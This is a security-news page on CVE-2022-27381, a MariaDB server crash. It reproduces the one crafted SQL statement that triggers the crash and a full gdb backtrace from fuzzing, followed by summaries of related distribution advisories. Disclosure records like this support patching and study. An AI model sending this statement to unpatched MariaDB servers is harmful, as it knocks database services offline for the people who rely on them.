Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-27381: [MDEV-26061] MariaDB server crash at Field::set_default

An issue in the component Field::set_default of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

CVE
#sql#linux#dos

CREATE TEMPORARY TABLE v0 ( v2 TIMESTAMP CHECK ( DEFAULT ( v2 ) IS NOT TRUE ) , v1 TIMESTAMP ) AS SELECT DISTINCT ‘x’ AS v3 WINDOW CHECKSUM AS ( ) ;

Core was generated by `/home/supersix/fuzz/security/MariaDB/install/bin/mysqld --defaults-file=/home/s’.

Program terminated with signal SIGSEGV, Segmentation fault.

#0 __pthread_kill (threadid=<optimized out>, signo=signo@entry=0xb)

at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

[Current thread is 1 (Thread 0x7f154c17f300 (LWP 1992265))]

gdb-peda$ #0 __pthread_kill (threadid=<optimized out>, signo=signo@entry=0xb)

at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1 0x00005640d742e98f in my_write_core (sig=sig@entry=0xb)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2 0x00005640d5e9b583 in handle_fatal_signal (sig=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3 <signal handler called>

#4 0x00005640d5dfe617 in Field::set_default (this=0x61d0000b9ab8)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/field.cc:2591

#5 0x00005640d5f553a6 in Item_default_value::calculate (this=0x6190000f5240)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:9468

#6 0x00005640d5f55466 in Item_default_value::val_real (this=0x6190000f5240)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:9486

#7 0x00005640d5bbf3bb in Type_handler_real_result::Item_val_bool (

this=<optimized out>, item=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_type.cc:5080

#8 0x00005640d5fa186c in Item_func_truth::val_bool (this=0x6190000f5370)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1165

#9 Item_func_truth::val_int (this=0x6190000f5370)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1188

#10 0x00005640d5966058 in TABLE::verify_constraints (this=0x6190000f4698,

ignore\_failure=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:6155

#11 0x00005640d5966bbd in TABLE_LIST::view_check_option (this=0x62b000085498,

thd=<optimized out>, ignore\_failure=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:6128

#12 0x00005640d5476284 in select_insert::send_data (this=0x62b0000871f0,

values=...)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_insert.cc:4061

#13 0x00005640d576aafa in select_result_sink::send_data_with_check (

u=0x62b0000823d0, sent=0x0, items=..., this=0x62b0000871f0)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:5609

#14 select_result_sink::send_data_with_check (sent=0x0, u=0x62b0000823d0,

items=..., this=0x62b0000871f0)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:5599

#15 JOIN::exec_inner (this=0x62b000087340)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4592

#16 0x00005640d576bd20 in JOIN::exec (this=0x62b000087340)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4504

#17 0x00005640d5762338 in mysql_select (thd=0x62b00007e218,

tables=<optimized out>, fields=..., conds=<optimized out>, og\_num=0x0,

order=<optimized out>, group=0x0, having=0x0, proc\_param=0x0,

select\_options=0x20080040b01, result=0x62b0000871f0, unit=0x62b0000823d0,

select\_lex=0x62b000086138)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4982

#18 0x00005640d5764425 in handle_select (thd=thd@entry=0x62b00007e218,

lex=lex@entry=0x62b000082308, result=result@entry=0x62b0000871f0,

setup\_tables\_done\_option=setup\_tables\_done\_option@entry=0x0)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:544

#19 0x00005640d588eb96 in Sql_cmd_create_table_like::execute (

this=<optimized out>, thd=0x62b00007e218)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_table.cc:11746

#20 0x00005640d5591a67 in mysql_execute_command (thd=<optimized out>,

is\_called\_from\_prepared\_stmt=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:5995

#21 0x00005640d55508dd in mysql_parse (thd=0x62b00007e218,

rawbuf=<optimized out>, length=<optimized out>,

parser\_state=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#22 0x00005640d55862a4 in dispatch_command (command=COM_QUERY,

thd=0x62b00007e218, packet=<optimized out>, packet\_length=<optimized out>,

blocking=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:233

#23 0x00005640d558b704 in do_command (thd=0x62b00007e218,

blocking=blocking@entry=0x1)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#24 0x00005640d5a4b14d in do_handle_one_connection (connect=<optimized out>,

put\_in\_cache=<optimized out>)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#25 0x00005640d5a4c807 in handle_one_connection (arg=arg@entry=0x608005322038)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#26 0x00005640d6897ef0 in pfs_spawn_thread (arg=0x617000005118)

at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#27 0x00007f155f9fb609 in start_thread (arg=<optimized out>)

at pthread\_create.c:477

#28 0x00007f155f5cf293 in clone ()

at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

gdb-peda$ quit

Related news

Gentoo Linux Security Advisory 202405-25

Gentoo Linux Security Advisory 202405-25 - Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code. Versions greater than or equal to 10.11.3:10.11 are affected.

Ubuntu Security Notice USN-5739-1

Ubuntu Security Notice 5739-1 - Several security issues were discovered in MariaDB and this update includes new upstream MariaDB versions to fix these issues. MariaDB has been updated to 10.3.37 in Ubuntu 20.04 LTS and to 10.6.11 in Ubuntu 22.04 LTS and Ubuntu 22.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

Red Hat Security Advisory 2022-6443-01

Red Hat Security Advisory 2022-6443-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include buffer overflow and use-after-free vulnerabilities.

RHSA-2022:6443: Red Hat Security Advisory: mariadb:10.3 security and bug fix update

An update for the mariadb:10.3 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via certain SELECT ...

Red Hat Security Advisory 2022-6306-01

Red Hat Security Advisory 2022-6306-01 - MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL. Issues addressed include buffer overflow and use-after-free vulnerabilities.

RHSA-2022:6306: Red Hat Security Advisory: rh-mariadb103-galera and rh-mariadb103-mariadb security and bug fix update

An update for rh-mariadb103-galera and rh-mariadb103-mariadb is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application ...

RHSA-2022:5948: Red Hat Security Advisory: galera, mariadb, and mysql-selinux security, bug fix, and enhancement update

An update for galera, mariadb, and mysql-selinux is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via cert...

RHSA-2022:5826: Red Hat Security Advisory: mariadb:10.5 security, bug fix, and enhancement update

An update for the mariadb:10.5 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via certain SELECT ...

RHSA-2022:5759: Red Hat Security Advisory: rh-mariadb105-galera and rh-mariadb105-mariadb security and bugfix update

An update for rh-mariadb105-galera and rh-mariadb105-mariadb is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application ...

CVE-2022-24052: Security Vulnerabilities Fixed in MariaDB

MariaDB CONNECT Storage Engine Heap-based Buffer Overflow Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MariaDB. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of SQL queries. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the service account. Was ZDI-CAN-16190.

CVE: Latest News

CVE-2023-6905
CVE-2023-6903
CVE-2023-3907
CVE-2023-6904